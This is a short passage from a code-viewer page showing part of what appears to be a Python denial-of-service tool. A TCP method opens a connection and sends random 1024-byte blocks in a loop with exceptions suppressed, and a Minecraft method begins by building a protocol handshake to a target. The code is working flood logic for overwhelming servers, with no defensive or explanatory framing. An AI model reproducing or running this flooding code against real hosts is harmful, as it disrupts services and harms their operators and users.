(self)
| 498 | return s |
| 499 | |
| 500 | def TCP(self) -> None: |
| 501 | s = None |
| 502 | with suppress(Exception), self.open_connection(AF_INET, SOCK_STREAM) as s: |
| 503 | while Tools.send(s, randbytes(1024)): |
| 504 | continue |
| 505 | Tools.safe_close(s) |
| 506 | |
| 507 | def MINECRAFT(self) -> None: |
| 508 | handshake = Minecraft.handshake(self._target, self.protocolid, 1) |
nothing calls this directly
no test coverage detected